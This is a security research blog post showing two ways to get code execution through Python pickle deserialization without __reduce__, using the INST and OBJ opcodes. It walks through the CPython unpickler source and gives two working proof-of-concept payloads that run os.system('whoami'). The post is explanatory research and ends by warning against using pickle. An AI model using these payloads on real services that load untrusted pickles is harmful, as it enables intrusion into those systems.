Python Pickle RCE without __reduce__
December 23, 2022
“Every single pickle deserialisation payload uses
__reduce__… I wonder if it’s possible to get RCE without it”
And that’s how I nerdsniped myself and lost 5h of my life.
Yes, it’s possible, here are two functional payloads:
>>> inst_bomb b'(S"whoami"\nios\nsystem\n.' >>> pickletools.dis(inst_bomb) 0: ( MARK 1: S STRING 'whoami' 11: i INST 'os system' (MARK at 0) 22: . STOP highest protocol among opcodes = 0 >>> pickle.loads(inst_bomb) alol
>>> obj_bomb b'(cos\nsystem\nS"whoami"\no.' >>> pickletools.dis(obj_bomb) 0: ( MARK 1: c GLOBAL 'os system' 12: S STRING 'whoami' 22: o OBJ (MARK at 0) 23: . STOP highest protocol among opcodes = 1 >>> pickle.loads(obj_bomb) alol
This blog post won’t explain:
- What (de)serialization is and the vulnerabilities that can arise, PortSwigger’s Web Security Academy has already done a great job at that.
- What the
picklemodule is, its inner workings have already been thoroughly explained in this great blog post and in
However, what it will detail is how the
REDUCE primitive could have been found and how to find novel (to my knowledge) exploit primitives.
For some additional reading, here are links to the best research done on pickle deserialization.
- Dangerous pickles — malicious python serialization [blog]: Already linked above, the best article to date on
pickledeserialization, very well explained.
- Never a dill moment: Exploiting machine learning pickle files [blog] [conf]: On the resurgence in the use of
picklefor Machine Learning and its security implications.
- Pain Pickle: Systemically bypassing restricted unpickle [conf] [slides]: Great research (in Cantonese) on how to systematically bypass
RestrictedUnpicklers to achieve RCE.
The REDUCE primitive #
Before looking for new exploit paths it’s a good idea to first understand how the existing one works by diving into the source code.
NB: Pre-existing comments in the source code have been removed for the sake of clarity.
REDUCE opcode is read, the main fetch-decode-execute loop calls the corresponding function (
def load_reduce(self): stack = self.stack args = stack.pop() # pop args (tuple) top of the stack func = stack[-1] # get value from top of the stack (function) stack[-1] = func(*args) # call func with args -> RCE # arg1(*arg2) is a pattern that will come back later.
load_reduce function requires a function to have already been pushed onto the stack. There are a few ways of doing this, the easiest being to use either the
STACK_GLOBAL instructions. Both corresponding functions work in a very similar way,
load_global reads the
name variables as strings whilst
load_stack_global loads the values off of the stack.
def load_global(self): module = self.readline()[:-1].decode("utf-8") # read module string name = self.readline()[:-1].decode("utf-8") # read name string klass = self.find_class(module, name) # call find_class self.append(klass) # append result to stack
The call to
find_class seems to be the important part of the function so let’s investigate.
N.B: Since the PROTO opcode (protocol version, 0 by default) is optional and has no real influence on the program flow it has been omitted from the given payloads for the sake of brevity.
def find_class(self, module, name): sys.audit('pickle.find_class', module, name) if self.proto < 3 and self.fix_imports: # fix the imports __import__(module, level=0) # import the module if self.proto >= 4: # both branchs do the same thing return _getattribute(sys.modules[module], name) else: return getattr(sys.modules[module], name) # return module.function
Being able to import functions and specific modules is an extremely useful primitive, thus the search for a REDUCE-less payload started by looking for functions calling
The INST primitive #
The only other interesting function that calls
find_class is the
def load_inst(self): module = self.readline()[:-1].decode("ascii") # read module string name = self.readline()[:-1].decode("ascii") # read name string klass = self.find_class(module, name) # call find_class self._instantiate(klass, self.pop_mark()) # call _instantiate
The function ends with a call to
def _instantiate(self, klass, args): if (args or not isinstance(klass, type) or hasattr(klass, "__getinitargs__")): try: value = klass(*args) # the arg1(*arg2) pattern reemerges except TypeError as err: raise TypeError("in constructor for %s: %s" % (klass.__name__, str(err)), sys.exc_info()) else: value = klass.__new__(klass) self.append(value)
Just like with
_instantiate takes a function (
klass) and a tuple (
args) as parameters and calls the function with the tuple’s values as arguments (
func(*args)), allowing for arbitrary code execution. Below is an annotated example payload:
>>> pickletools.dis(b'(S"whoami"\nios\nsystem\n.', annotate=1) 0: ( MARK Push markobject onto the stack. 1: S STRING 'whoami' Push a Python string object. 11: i INST 'os system' (MARK at 0) Build a class instance. 22: . STOP Stop the unpickling machine. highest protocol among opcodes = 0 >>> pickle.loads(b'(S"whoami"\nios\nsystem\n.') alol
The OBJ primitive #
The search for other functions calling
_instantiate yielded only a single other function:
def load_obj(self): args = self.pop_mark() cls = args.pop(0) self._instantiate(cls, args)
It works in a very similar way to
load_reduce: the function gets two variables, one containing a function and the other containing a tuple of arguments, and calls the function with the arguments. Below is an annotated example payload:
>>> pickletools.dis(b'(cos\nsystem\nS"whoami"\no.') 0: ( MARK Push markobject onto the stack. 1: c GLOBAL 'os system' Push a global object (module.attr) on the stack. 12: S STRING 'whoami' Push a Python string object. 22: o OBJ (MARK at 0) Build a class instance. 23: . STOP Stop the unpickling machine. highest protocol among opcodes = 1 >>> pickle.loads(b'(cos\nsystem\nS"whoami"\no.') alol
Please stop using pickle, attempts to make pickle secure are meaningless (except for adding data signing with HMAC I guess) as the hacker will forever subvert the developer.